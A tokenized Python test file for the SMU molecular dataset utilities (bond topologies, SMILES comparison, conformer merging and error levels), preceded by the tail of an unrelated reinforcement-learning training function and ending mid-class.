total_T=self.total_T)<block_end>self.total_T<augadd>D.total_T<line_sep>out={}<if_stmt>self.policy.lr_scheduler<is><not><none><block_start>out['current_lr']=self.policy.lr_scheduler.get_lr()<block_end>out['loss']=loss.item()<line_sep>out['policy_loss']=policy_loss.item()<line_sep>out['entropy_loss']=entropy_loss.item()<line_sep>out['policy_entropy']=-entropy_loss.item()<line_sep>out['value_loss']=value_loss.item()<line_sep>ev=ExplainedVariance()<line_sep>ev=ev(y_true=Qs.detach().cpu().numpy().squeeze() y_pred=all_Vs.detach().cpu().numpy().squeeze())<line_sep>out['explained_variance']=ev<line_sep><return>out<block_end>@property<def_stmt>recurrent self<block_start><pass><block_end><block_end> |
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for smu_utils_lib."""<import_stmt>copy<import_stmt>os<import_stmt>tempfile<import_from_stmt>absl.testing absltest<import_from_stmt>absl.testing parameterized<import_stmt>numpy<as>np<import_stmt>pandas<as>pd<import_from_stmt>rdkit Chem<import_from_stmt>google.protobuf text_format<import_from_stmt>smu dataset_pb2<import_from_stmt>smu.parser smu_parser_lib<import_from_stmt>smu.parser smu_utils_lib<line_sep>MAIN_DAT_FILE='x07_sample.dat'<line_sep>STAGE1_DAT_FILE='x07_stage1.dat'<line_sep>TESTDATA_PATH=os.path.join(os.path.dirname(os.path.abspath(__file__)) 'testdata')<def_stmt>str_to_bond_topology s<block_start>bt=dataset_pb2.BondTopology()<line_sep>text_format.Parse(s bt)<line_sep><return>bt<block_end><def_stmt>get_stage1_conformer <block_start>parser=smu_parser_lib.SmuParser(os.path.join(TESTDATA_PATH STAGE1_DAT_FILE))<line_sep>conformer,_=next(parser.process_stage1())<line_sep><return>conformer<block_end><def_stmt>get_stage2_conformer <block_start>parser=smu_parser_lib.SmuParser(os.path.join(TESTDATA_PATH MAIN_DAT_FILE))<line_sep>conformer,_=next(parser.process_stage2())<line_sep><return>conformer<block_end><class_stmt>SpecialIDTest(absltest.TestCase)<block_start><def_stmt>test_from_dat_id self<block_start>self.assertIsNone(smu_utils_lib.special_case_bt_id_from_dat_id(123456 'CC'))<line_sep>self.assertEqual(smu_utils_lib.special_case_bt_id_from_dat_id(999998 'O') 899650)<line_sep>self.assertEqual(smu_utils_lib.special_case_bt_id_from_dat_id(0 'O') 899650)<with_stmt>self.assertRaises(ValueError)<block_start>smu_utils_lib.special_case_bt_id_from_dat_id(0 'NotASpecialCaseSmiles')<block_end><block_end><def_stmt>test_from_bt_id self<block_start>self.assertIsNone(smu_utils_lib.special_case_dat_id_from_bt_id(123456))<line_sep>self.assertEqual(smu_utils_lib.special_case_dat_id_from_bt_id(899651) 999997)<block_end><block_end><class_stmt>GetCompositionTest(absltest.TestCase)<block_start><def_stmt>test_simple self<block_start>bt=dataset_pb2.BondTopology()<line_sep>bt.atoms.extend([dataset_pb2.BondTopology.ATOM_C dataset_pb2.BondTopology.ATOM_C dataset_pb2.BondTopology.ATOM_N dataset_pb2.BondTopology.ATOM_H dataset_pb2.BondTopology.ATOM_H dataset_pb2.BondTopology.ATOM_H])<line_sep>self.assertEqual('x03_c2nh3' smu_utils_lib.get_composition(bt))<block_end><block_end><class_stmt>GetCanonicalStoichiometryWithHydrogensTest(absltest.TestCase)<block_start><def_stmt>test_cyclobutane self<block_start>bt=smu_utils_lib.create_bond_topology('CCCC' '110011' '2222')<line_sep>self.assertEqual(smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(bt) '(ch2)4')<block_end><def_stmt>test_ethylene self<block_start>bt=smu_utils_lib.create_bond_topology('CC' '2' '22')<line_sep>self.assertEqual(smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(bt) '(ch2)2')<block_end><def_stmt>test_acrylic_acid self<block_start>bt=smu_utils_lib.create_bond_topology('CCCOO' '2000100210' '21001')<line_sep>self.assertEqual(smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(bt) '(c)(ch)(ch2)(o)(oh)')<block_end><def_stmt>test_fluorine self<block_start>bt=smu_utils_lib.create_bond_topology('OFF' '110' '000')<line_sep>self.assertEqual(smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(bt) '(o)(f)2')<block_end><def_stmt>test_fully_saturated self<block_start>self.assertEqual(smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(smu_utils_lib.create_bond_topology('C' '' '4')) '(ch4)')<line_sep>self.assertEqual(smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(smu_utils_lib.create_bond_topology('N' '' '3')) '(nh3)')<line_sep>self.assertEqual(smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(smu_utils_lib.create_bond_topology('O' '' '2')) '(oh2)')<line_sep>self.assertEqual(smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(smu_utils_lib.create_bond_topology('F' '' '1')) '(fh)')<block_end><def_stmt>test_nplus_oneg self<block_start>bt=smu_utils_lib.create_bond_topology('NO' '1' '30')<line_sep>self.assertEqual(smu_utils_lib.get_canonical_stoichiometry_with_hydrogens(bt) '(nh3)(o)')<block_end><block_end><class_stmt>ParseBondTopologyTest(absltest.TestCase)<block_start><def_stmt>test_4_heavy self<block_start>num_atoms,atoms_str,matrix,hydrogens=smu_utils_lib.parse_bond_topology_line(' 4 N+O O O- 010110 3000')<line_sep>self.assertEqual(num_atoms 4)<line_sep>self.assertEqual(atoms_str 'N+O O O-')<line_sep>self.assertEqual(matrix '010110')<line_sep>self.assertEqual(hydrogens '3000')<block_end><def_stmt>test_7_heavy self<block_start>num_atoms,atoms_str,matrix,hydrogens=smu_utils_lib.parse_bond_topology_line(' 7 N+O O O O-F F 001011101001000000000 1000000')<line_sep>self.assertEqual(num_atoms 7)<line_sep>self.assertEqual(atoms_str 'N+O O O O-F F ')# Note the trailing space
self.assertEqual(matrix '001011101001000000000')<line_sep>self.assertEqual(hydrogens '1000000')<block_end><block_end><class_stmt>CreateBondTopologyTest(absltest.TestCase)<block_start><def_stmt>test_no_charged self<block_start>got=smu_utils_lib.create_bond_topology('CNFF' '111000' '1200')<line_sep>expected_str="""
atoms: ATOM_C
atoms: ATOM_N
atoms: ATOM_F
atoms: ATOM_F
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
bonds {
atom_b: 1
bond_type: BOND_SINGLE
}
bonds {
atom_b: 2
bond_type: BOND_SINGLE
}
bonds {
atom_b: 3
bond_type: BOND_SINGLE
}
bonds {
atom_b: 4
bond_type: BOND_SINGLE
}
bonds {
atom_a: 1
atom_b: 5
bond_type: BOND_SINGLE
}
bonds {
atom_a: 1
atom_b: 6
bond_type: BOND_SINGLE
}
"""<line_sep>expected=str_to_bond_topology(expected_str)<line_sep>self.assertEqual(str(expected) str(got))<block_end><def_stmt>test_charged self# This is actually C N N+O-
<block_start>got=smu_utils_lib.create_bond_topology('CNNO' '200101' '2020')<line_sep>expected_str="""
atoms: ATOM_C
atoms: ATOM_N
atoms: ATOM_NPOS
atoms: ATOM_ONEG
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
bonds {
atom_b: 1
bond_type: BOND_DOUBLE
}
bonds {
atom_a: 1
atom_b: 2
bond_type: BOND_SINGLE
}
bonds {
atom_a: 2
atom_b: 3
bond_type: BOND_SINGLE
}
bonds {
atom_b: 4
bond_type: BOND_SINGLE
}
bonds {
atom_b: 5
bond_type: BOND_SINGLE
}
bonds {
atom_a: 2
atom_b: 6
bond_type: BOND_SINGLE
}
bonds {
atom_a: 2
atom_b: 7
bond_type: BOND_SINGLE
}
"""<line_sep>expected=str_to_bond_topology(expected_str)<line_sep>self.assertEqual(str(expected) str(got))<block_end><def_stmt>test_one_heavy self<block_start>got=smu_utils_lib.create_bond_topology('C' '' '4')<line_sep>expected_str="""
atoms: ATOM_C
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
bonds {
atom_b: 1
bond_type: BOND_SINGLE
}
bonds {
atom_b: 2
bond_type: BOND_SINGLE
}
bonds {
atom_b: 3
bond_type: BOND_SINGLE
}
bonds {
atom_b: 4
bond_type: BOND_SINGLE
}
"""<line_sep>expected=str_to_bond_topology(expected_str)<line_sep>self.assertEqual(str(expected) str(got))<block_end><block_end><class_stmt>FromCSVTest(absltest.TestCase)<block_start><def_stmt>test_basic self<block_start>infile=tempfile.NamedTemporaryFile(mode='w' delete=<false>)<line_sep>infile.write('id,num_atoms,atoms_str,connectivity_matrix,hydrogens,smiles\n')<line_sep>infile.write('68,3,C N+O-,310,010,[NH+]#C[O-]\n')<line_sep>infile.write('134,4,N+O-F F ,111000,1000,[O-][NH+](F)F\n')<line_sep>infile.close()<line_sep>out=smu_utils_lib.generate_bond_topologies_from_csv(infile.name)<line_sep>bt=next(out)<line_sep>self.assertEqual(68 bt.bond_topology_id)<line_sep>self.assertLen(bt.atoms 4)<line_sep>self.assertEqual(bt.smiles '[NH+]#C[O-]')<line_sep>bt=next(out)<line_sep>self.assertEqual(134 bt.bond_topology_id)<line_sep>self.assertLen(bt.atoms 5)<line_sep>self.assertEqual(bt.smiles '[O-][NH+](F)F')<block_end><block_end><class_stmt>ParseDuplicatesFileTest(absltest.TestCase)<block_start><def_stmt>test_basic self<block_start>df=smu_utils_lib.parse_duplicates_file(os.path.join(TESTDATA_PATH 'small.equivalent_isomers.dat'))<line_sep>pd.testing.assert_frame_equal(pd.DataFrame(columns=['name1' 'stoich1' 'btid1' 'shortconfid1' 'confid1' 'name2' 'stoich2' 'btid2' 'shortconfid2' 'confid2'] data=[['x07_c2n2o2fh3.224227.004' 'c2n2o2fh3' 224227 4 224227004 'x07_c2n2o2fh3.224176.005' 'c2n2o2fh3' 224176 5 224176005] ['x07_c2n2o2fh3.260543.005' 'c2n2o2fh3' 260543 5 260543005 'x07_c2n2o2fh3.224050.001' 'c2n2o2fh3' 224050 1 224050001] ]) df check_like=<true>)<block_end><block_end><class_stmt>BondTopologyToMoleculeTest(absltest.TestCase)<block_start><def_stmt>test_o2 self<block_start>bond_topology=str_to_bond_topology("""
atoms: ATOM_O
atoms: ATOM_O
bonds {
atom_b: 1
bond_type: BOND_DOUBLE
}
""")<line_sep>got=smu_utils_lib.bond_topology_to_molecule(bond_topology)<line_sep>self.assertEqual('O=O' Chem.MolToSmiles(got))<block_end><def_stmt>test_methane self<block_start>bond_topology=str_to_bond_topology("""
atoms: ATOM_C
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
atoms: ATOM_H
bonds {
atom_b: 1
bond_type: BOND_SINGLE
}
bonds {
atom_b: 2
bond_type: BOND_SINGLE
}
bonds {
atom_b: 3
bond_type: BOND_SINGLE
}
bonds {
atom_b: 4
bond_type: BOND_SINGLE
}
""")<line_sep>got=smu_utils_lib.bond_topology_to_molecule(bond_topology)<line_sep>self.assertEqual('[H]C([H])([H])[H]' Chem.MolToSmiles(got))<block_end># This molecule is an N+ central atom, bonded to C (triply), O-, and F
<def_stmt>test_charged_molecule self<block_start>bond_topology=str_to_bond_topology("""
atoms: ATOM_C
atoms: ATOM_NPOS
atoms: ATOM_ONEG
atoms: ATOM_F
bonds {
atom_b: 1
bond_type: BOND_TRIPLE
}
bonds {
atom_a: 1
atom_b: 2
bond_type: BOND_SINGLE
}
bonds {
atom_a: 1
atom_b: 3
bond_type: BOND_SINGLE
}
""")<line_sep>got=smu_utils_lib.bond_topology_to_molecule(bond_topology)<line_sep>self.assertEqual('C#[N+]([O-])F' Chem.MolToSmiles(got))<block_end><block_end><class_stmt>ConformerToMoleculeTest(absltest.TestCase)<block_start><def_stmt>setUp self<block_start>super().setUp()<line_sep>self.conformer=get_stage2_conformer()<line_sep># We'll make a new initial_geometry which is just the current one with all
# coordinates multiplied by 1000
self.conformer.initial_geometries.append(self.conformer.initial_geometries[0])<line_sep>new_geom=self.conformer.initial_geometries[1]<for_stmt>atom_pos new_geom.atom_positions<block_start>atom_pos.x=atom_pos.x<times>1000<line_sep>atom_pos.y=atom_pos.y<times>1000<line_sep>atom_pos.z=atom_pos.z<times>1000<block_end># For the extra bond_topology, we'll just copy the existing one and change
# the id. Through the dumb luck of the molecule we picked there's not a
# simple way to make this a new bond topology and still have it look valid
# to RDKit
self.conformer.bond_topologies.append(self.conformer.bond_topologies[0])<line_sep>self.conformer.bond_topologies[1].bond_topology_id=99999<block_end><def_stmt>test_all_outputs self<block_start>mols=list(smu_utils_lib.conformer_to_molecules(self.conformer))<line_sep>self.assertLen(mols 6)# 2 bond topologies * (1 opt geom + 2 init_geom)
self.assertEqual([m.GetProp('_Name')<for>m mols] ['SMU 618451001 bt=618451(0/2) geom=init(0/2)' 'SMU 618451001 bt=618451(0/2) geom=init(1/2)' 'SMU 618451001 bt=618451(0/2) geom=opt' 'SMU 618451001 bt=99999(1/2) geom=init(0/2)' 'SMU 618451001 bt=99999(1/2) geom=init(1/2)' 'SMU 618451001 bt=99999(1/2) geom=opt'])<line_sep>self.assertEqual('[H]C(F)=C(OC([H])([H])[H])OC([H])([H])[H]' Chem.MolToSmiles(mols[0] kekuleSmiles=<true> isomericSmiles=<false>))<line_sep>self.assertEqual('[H]C(F)=C(OC([H])([H])[H])OC([H])([H])[H]' Chem.MolToSmiles(mols[4] kekuleSmiles=<true> isomericSmiles=<false>))<block_end><def_stmt>test_initial_only self<block_start>mols=list(smu_utils_lib.conformer_to_molecules(self.conformer include_initial_geometries=<true> include_optimized_geometry=<false> include_all_bond_topologies=<false>))<line_sep>self.assertLen(mols 2)<line_sep>self.assertEqual([m.GetProp('_Name')<for>m mols] ['SMU 618451001 bt=618451(0/2) geom=init(0/2)' 'SMU 618451001 bt=618451(0/2) geom=init(1/2)' ])<line_sep># This is just one random atom I picked from the .dat file and converted to
# angstroms instead of bohr.
self.assertEqual('C' mols[0].GetAtomWithIdx(1).GetSymbol())<line_sep>np.testing.assert_allclose([0.6643 -3.470301 3.4766] list(mols[0].GetConformer().GetAtomPosition(1)) atol=1e-6)<line_sep>self.assertEqual('C' mols[1].GetAtomWithIdx(1).GetSymbol())<line_sep>np.testing.assert_allclose([664.299998 -3470.300473 3476.600215] list(mols[1].GetConformer().GetAtomPosition(1)) atol=1e-6)<block_end><def_stmt>test_optimized_only self<block_start>mols=list(smu_utils_lib.conformer_to_molecules(self.conformer include_initial_geometries=<false> include_optimized_geometry=<true> include_all_bond_topologies=<false>))<line_sep>self.assertLen(mols 1)<line_sep>self.assertEqual(mols[0].GetProp('_Name') 'SMU 618451001 bt=618451(0/2) geom=opt' )<line_sep>self.assertEqual('[H]C(F)=C(OC([H])([H])[H])OC([H])([H])[H]' Chem.MolToSmiles(mols[0] kekuleSmiles=<true> isomericSmiles=<false>))<line_sep># This is just two random atoms I picked from the .dat file and converted to
# angstroms instead of bohr.
self.assertEqual('C' mols[0].GetAtomWithIdx(1).GetSymbol())<line_sep>np.testing.assert_allclose([0.540254 -3.465543 3.456982] list(mols[0].GetConformer().GetAtomPosition(1)) atol=1e-6)<line_sep>self.assertEqual('H' mols[0].GetAtomWithIdx(13).GetSymbol())<line_sep>np.testing.assert_allclose([2.135153 -1.817366 0.226376] list(mols[0].GetConformer().GetAtomPosition(13)) atol=1e-6)<block_end><block_end><class_stmt>SmilesCompareTest(absltest.TestCase)<block_start><def_stmt>test_string_format self# for some simplicity later on, we use shorter names
<block_start>self.assertEqual('MISSING' str(smu_utils_lib.SmilesCompareResult.MISSING))<line_sep>self.assertEqual('MISMATCH' str(smu_utils_lib.SmilesCompareResult.MISMATCH))<line_sep>self.assertEqual('MATCH' str(smu_utils_lib.SmilesCompareResult.MATCH))<block_end><def_stmt>test_missing self<block_start>bond_topology=str_to_bond_topology("""
atoms: ATOM_O
atoms: ATOM_O
bonds {
atom_b: 1
bond_type: BOND_DOUBLE
}
""")<line_sep>result,with_h,without_h=smu_utils_lib.bond_topology_smiles_comparison(bond_topology)<line_sep>self.assertEqual(smu_utils_lib.SmilesCompareResult.MISSING result)<line_sep>self.assertEqual('O=O' with_h)<line_sep>self.assertEqual('O=O' without_h)<line_sep># Also directly test compute_smiles_for_bond_topology
self.assertEqual('O=O' smu_utils_lib.compute_smiles_for_bond_topology(bond_topology include_hs=<true>))<block_end><def_stmt>test_mismatch self<block_start>bond_topology=str_to_bond_topology("""
atoms: ATOM_O
atoms: ATOM_O
bonds {
atom_b: 1
bond_type: BOND_DOUBLE
}
smiles: "BlahBlahBlah"
""")<line_sep>result,with_h,without_h=smu_utils_lib.bond_topology_smiles_comparison(bond_topology)<line_sep>self.assertEqual(smu_utils_lib.SmilesCompareResult.MISMATCH result)<line_sep>self.assertEqual('O=O' with_h)<line_sep>self.assertEqual('O=O' without_h)<block_end><def_stmt>test_matched_and_h_stripping self<block_start>bond_topology=str_to_bond_topology("""
atoms: ATOM_O
atoms: ATOM_H
atoms: ATOM_H
bonds {
atom_b: 1
bond_type: BOND_SINGLE
}
bonds {
atom_b: 2
bond_type: BOND_SINGLE
}
smiles: "O"
""")<line_sep>result,with_h,without_h=smu_utils_lib.bond_topology_smiles_comparison(bond_topology)<line_sep>self.assertEqual(smu_utils_lib.SmilesCompareResult.MATCH result)<line_sep>self.assertEqual('[H]O[H]' with_h)<line_sep>self.assertEqual('O' without_h)<line_sep># Also directly test compute_smiles_for_bond_topology
self.assertEqual('[H]O[H]' smu_utils_lib.compute_smiles_for_bond_topology(bond_topology include_hs=<true>))<line_sep>self.assertEqual('O' smu_utils_lib.compute_smiles_for_bond_topology(bond_topology include_hs=<false>))<block_end><def_stmt>test_compute_smiles_from_molecule_no_hs self<block_start>mol=Chem.MolFromSmiles('FOC' sanitize=<false>)<line_sep>self.assertEqual(smu_utils_lib.compute_smiles_for_molecule(mol include_hs=<false>) 'COF')<line_sep># This is expected. Even with include_hs=True, if there were no Hs in the
# molecule, they will not be in the smiles.
self.assertEqual(smu_utils_lib.compute_smiles_for_molecule(mol include_hs=<true>) 'COF')<block_end><def_stmt>test_compute_smiles_from_molecule_with_hs self<block_start>mol=Chem.MolFromSmiles('FOC' sanitize=<false>)<line_sep>Chem.SanitizeMol(mol Chem.rdmolops.SanitizeFlags.SANITIZE_ADJUSTHS)<line_sep>mol=Chem.AddHs(mol)<line_sep>self.assertEqual(smu_utils_lib.compute_smiles_for_molecule(mol include_hs=<false>) 'COF')<line_sep>self.assertEqual(smu_utils_lib.compute_smiles_for_molecule(mol include_hs=<true>) '[H]C([H])([H])OF')<block_end><def_stmt>test_compute_smiles_from_molecule_special_case self<block_start>mol=Chem.MolFromSmiles('C12=C3C4=C1C4=C23' sanitize=<false>)<line_sep># Double check that this really is the special case -- we get back the
# SMILES we put in even though it's not the one we want.
self.assertEqual('C12=C3C4=C1C4=C23' Chem.MolToSmiles(mol kekuleSmiles=<true>))<line_sep>self.assertEqual(smu_utils_lib.compute_smiles_for_molecule(mol include_hs=<false>) 'C12=C3C1=C1C2=C31')<block_end><def_stmt>test_compute_smiles_from_molecule_labeled_with_h self<block_start>mol=Chem.MolFromSmiles('[O-][N+]([H])([H])N([H])OC([H])([H])F' sanitize=<false>)<line_sep>self.assertIsNotNone(mol)<line_sep>self.assertEqual('[O-][N+:1]([H:2])([H:3])[N:4]([H:5])[O:6][C:7]([H:8])([H:9])[F:10]' smu_utils_lib.compute_smiles_for_molecule(mol include_hs=<true> labeled_atoms=<true>))<block_end><def_stmt>test_compute_smiles_from_molecule_labeled_no_h self<block_start>mol=Chem.MolFromSmiles('[O-][N+]([H])([H])N([H])OC([H])([H])F' sanitize=<false>)<line_sep>self.assertIsNotNone(mol)<line_sep>self.assertEqual('[O-][NH2+:1][NH:2][O:3][CH2:4][F:5]' smu_utils_lib.compute_smiles_for_molecule(mol include_hs=<false> labeled_atoms=<true>))<block_end><block_end><class_stmt>MergeConformersTest(absltest.TestCase)<block_start><def_stmt>setUp self<block_start>super().setUp()<line_sep># We are relying on the fact that the first conformer in both x07_sample.dat
# and x07_stage1.dat are the same.
self.stage1_conformer=get_stage1_conformer()<line_sep>self.stage2_conformer=get_stage2_conformer()<line_sep>self.duplicate_conformer=dataset_pb2.Conformer()<line_sep>self.duplicate_conformer.conformer_id=self.stage1_conformer.conformer_id<line_sep># A real duplicate conformer wouldn't have both of these fields filled in,
# but it's fine for the test to make sure everything is copied.
self.duplicate_conformer.duplicated_by=123<line_sep>self.duplicate_conformer.duplicate_of.extend([111 222])<block_end><def_stmt>test_two_stage2 self<block_start><with_stmt>self.assertRaises(ValueError)<block_start>smu_utils_lib.merge_conformer(self.stage2_conformer self.stage2_conformer)<block_end><block_end><def_stmt>test_two_stage1 self<block_start><with_stmt>self.assertRaises(ValueError)<block_start>smu_utils_lib.merge_conformer(self.stage1_conformer self.stage1_conformer)<block_end><block_end><def_stmt>test_two_duplicates self<block_start>duplicate_conformer2=copy.deepcopy(self.duplicate_conformer)<line_sep>duplicate_conformer2.duplicate_of[:]=[333 444]<line_sep>got_conf,got_conflict=smu_utils_lib.merge_conformer(self.duplicate_conformer duplicate_conformer2)<line_sep>self.assertIsNone(got_conflict)<line_sep>self.assertEqual(123 got_conf.duplicated_by)<line_sep>self.assertCountEqual([111 222 333 444] got_conf.duplicate_of)<block_end><def_stmt>test_stage2_stage1 self# Add a duplicate to stage1 to make sure it is copied
<block_start>self.stage1_conformer.duplicate_of.append(999)<line_sep>got_conf,got_conflict=smu_utils_lib.merge_conformer(self.stage2_conformer self.stage1_conformer)<line_sep>self.assertIsNone(got_conflict)<line_sep>self.assertEqual(got_conf.duplicate_of [999])<line_sep># Just check a random field that is in stage2 but not stage1
self.assertNotEmpty(got_conf.properties.normal_modes)<block_end><def_stmt>test_stage2_stage1_conflict_energy self<block_start>self.stage2_conformer.properties.initial_geometry_energy.value=-1.23<line_sep>got_conf,got_conflict=smu_utils_lib.merge_conformer(self.stage2_conformer self.stage1_conformer)<line_sep>self.assertEqual(got_conflict [618451001 1 1 1 1 -406.51179 0.052254 -406.522079 2.5e-05 <true> <true> 1 1 1 1 -1.23 0.052254 -406.522079 2.5e-05 <true> <true>])<line_sep># Just check a random field that is in stage2 but not stage1
self.assertNotEmpty(got_conf.properties.normal_modes)<line_sep># This stage2 values should be returned
self.assertEqual(got_conf.properties.initial_geometry_energy.value -1.23)<block_end><def_stmt>test_stage2_stage1_conflict_missing_geometry self<block_start>self.stage2_conformer.ClearField('optimized_geometry')<line_sep>got_conf,got_conflict=smu_utils_lib.merge_conformer(self.stage2_conformer self.stage1_conformer)<line_sep>self.assertEqual(got_conflict [618451001 1 1 1 1 -406.51179 0.052254 -406.522079 2.5e-05 <true> <true> 1 1 1 1 -406.51179 0.052254 -406.522079 2.5e-05 <true> <false>])<line_sep># Just check a random field that is in stage2 but not stage1
self.assertNotEmpty(got_conf.properties.normal_modes)<block_end><def_stmt>test_stage2_stage1_no_conflict_minus1 self# If stage2 contains a -1, we keep that (stricter error checking later on)
<block_start>self.stage2_conformer.properties.initial_geometry_energy.value=-1.0<line_sep>got_conf,got_conflict=smu_utils_lib.merge_conformer(self.stage2_conformer self.stage1_conformer)<line_sep>self.assertIsNone(got_conflict)<line_sep>self.assertEqual(got_conf.properties.initial_geometry_energy.value -1.0)<block_end><def_stmt>test_stage2_stage1_no_conflict_approx_equal self<block_start>self.stage2_conformer.properties.initial_geometry_energy.value<augadd>1e-7<line_sep>got_conf,got_conflict=smu_utils_lib.merge_conformer(self.stage2_conformer self.stage1_conformer)<line_sep>self.assertIsNone(got_conflict)<line_sep># Just check a random field from stage2
self.assertNotEmpty(got_conf.properties.normal_modes)<block_end><def_stmt>test_stage2_duplicate self<block_start>got_conf,got_conflict=smu_utils_lib.merge_conformer(self.stage2_conformer self.duplicate_conformer)<line_sep>self.assertIsNone(got_conflict)<line_sep>self.assertEqual(got_conf.duplicate_of [111 222])<line_sep>self.assertEqual(got_conf.duplicated_by 123)<line_sep># Just check a random field from stage2
self.assertNotEmpty(got_conf.properties.normal_modes)<block_end><def_stmt>test_stage1_duplicate self<block_start>got_conf,got_conflict=smu_utils_lib.merge_conformer(self.stage1_conformer self.duplicate_conformer)<line_sep>self.assertIsNone(got_conflict)<line_sep>self.assertEqual(got_conf.duplicate_of [111 222])<line_sep>self.assertEqual(got_conf.duplicated_by 123)<line_sep># Just check a random field from stage1
self.assertTrue(got_conf.properties.HasField('initial_geometry_energy'))<block_end><def_stmt>test_multiple_initial_geometries self<block_start>bad_conformer=copy.deepcopy(self.stage1_conformer)<line_sep>bad_conformer.initial_geometries.append(bad_conformer.initial_geometries[0])<with_stmt>self.assertRaises(ValueError)<block_start>smu_utils_lib.merge_conformer(bad_conformer self.stage2_conformer)<block_end><with_stmt>self.assertRaises(ValueError)<block_start>smu_utils_lib.merge_conformer(self.stage2_conformer bad_conformer)<block_end><block_end><def_stmt>test_multiple_bond_topologies self<block_start>bad_conformer=copy.deepcopy(self.stage1_conformer)<line_sep>bad_conformer.bond_topologies.append(bad_conformer.bond_topologies[0])<with_stmt>self.assertRaises(ValueError)<block_start>smu_utils_lib.merge_conformer(bad_conformer self.stage2_conformer)<block_end><with_stmt>self.assertRaises(ValueError)<block_start>smu_utils_lib.merge_conformer(self.stage2_conformer bad_conformer)<block_end><block_end><def_stmt>test_different_bond_topologies self<block_start>self.stage1_conformer.bond_topologies[0].atoms[0]=(dataset_pb2.BondTopology.ATOM_H)<with_stmt>self.assertRaises(ValueError)<block_start>smu_utils_lib.merge_conformer(self.stage1_conformer self.stage2_conformer)<block_end><with_stmt>self.assertRaises(ValueError)<block_start>smu_utils_lib.merge_conformer(self.stage2_conformer self.stage1_conformer)<block_end><block_end><block_end><class_stmt>ConformerErrorTest(absltest.TestCase)<block_start><def_stmt>test_stage1_no_error self<block_start>conformer=get_stage1_conformer()<line_sep>self.assertEqual(0 smu_utils_lib.conformer_calculation_error_level(conformer))<block_end><def_stmt>test_stage1_error self<block_start>conformer=get_stage1_conformer()<line_sep>conformer.properties.errors.error_frequencies=123<line_sep>self.assertEqual(5 smu_utils_lib.conformer_calculation_error_level(conformer))<block_end><def_stmt>test_stage2_no_error self<block_start>conformer=get_stage2_conformer()<line_sep>self.assertEqual(0 smu_utils_lib.conformer_calculation_error_level(conformer))<block_end><def_stmt>test_stage2_error_status_5 self<block_start>conformer=get_stage2_conformer()<line_sep>conformer.properties.errors.status=256<line_sep>self.assertEqual(5 smu_utils_lib.conformer_calculation_error_level(conformer))<block_end><def_stmt>test_stage2_error_status_4 self<block_start>conformer=get_stage2_conformer()<line_sep>conformer.properties.errors.status=50<line_sep>self.assertEqual(4 smu_utils_lib.conformer_calculation_error_level(conformer))<block_end><def_stmt>test_stage2_error_status_3 self<block_start>conformer=get_stage2_conformer()<line_sep>conformer.properties.errors.status=4<line_sep>self.assertEqual(3 smu_utils_lib.conformer_calculation_error_level(conformer))<block_end><def_stmt>test_stage2_error_level_2 self<block_start>conformer=get_stage2_conformer()<line_sep>conformer.properties.errors.warn_t1_excess=3<line_sep>self.assertEqual(2 smu_utils_lib.conformer_calculation_error_level(conformer))<block_end><def_stmt>test_stage2_error_level_1 self<block_start>conformer=get_stage2_conformer()<line_sep>conformer.properties.errors.warn_vib_linearity=1<line_sep>self.assertEqual(1 smu_utils_lib.conformer_calculation_error_level(conformer))<block_end><block_end><class_stmt>FilterConformerByAvailabilityTest(absltest.TestCase)<block_start><def_stmt>setUp self<block_start>super().setUp()<line_sep>self.conformer=dataset_pb2.Conformer()<line_sep>properties=self.conformer.properties<line_sep># A STANDARD field
properties.initial_geometry_energy.value=1.23<line_sep># A COMPLETE field
properties.zpe_unscaled.value=1.23<line_sep># An INTERNAL_ONLY field
properties.compute_cluster_info='not set'<block_end><def_stmt>test_standard self<block_start>smu_utils_lib.filter_conformer_by_availability(self.conformer [dataset_pb2.STANDARD])<line_sep>self.assertTrue(self.conformer.properties.HasField('initial_geometry_energy'))<line_sep>self.assertFalse(self.conformer.properties.HasField('zpe_unscaled'))<line_sep>self.assertFalse(self.conformer.properties.HasField('compute_cluster_info'))<block_end><def_stmt>test_complete_and_internal_only self<block_start>smu_utils_lib.filter_conformer_by_availability(self.conformer [dataset_pb2.COMPLETE dataset_pb2.INTERNAL_ONLY])<line_sep>self.assertFalse(self.conformer.properties.HasField('initial_geometry_energy'))<line_sep>self.assertTrue(self.conformer.properties.HasField('zpe_unscaled'))<line_sep>self.assertTrue(self.conformer.properties.HasField('compute_cluster_info'))<block_end><block_end><class_stmt>ConformerToStandardTest(absltest.TestCase)<block_start><def_stmt>setUp self<block_start>super().setUp()<line_sep>self.conformer=get_stage2_conformer()<block_end><def_stmt>test_field_filtering self# Check that the field which should be filtered starts out set
<block_start>self.assertTrue(self.conformer.properties.HasField('optimized_geometry_energy'))<line_sep>got=smu_utils_lib.conformer_to_standard(self.conformer)<line_sep># Check for a field that was originally in self.conformer and should be
# filtered and a field which should still be present.
self.assertTrue(got.properties.HasField('optimized_geometry_energy'))<line_sep>self.assertFalse(got.properties.HasField('zpe_unscaled'))<block_end><def_stmt>test_remove_error_conformer self<block_start>self.conformer.properties.errors.status=256<line_sep>self.assertIsNone(smu_utils_lib.conformer_to_standard(self.conformer))<block_end><def_stmt>test_remove_duplicate self<block_start>self.conformer.duplicated_by=123<line_sep>self.assertIsNone(smu_utils_lib.conformer_to_standard(self.conformer))<block_end><block_end><class_stmt>DetermineFateTest(parameterized.TestCase)<block_start><def_stmt>test_duplicate_same_topology self<block_start>conformer=get_stage1_conformer()<line_sep># bond topology is conformer_id // 1000
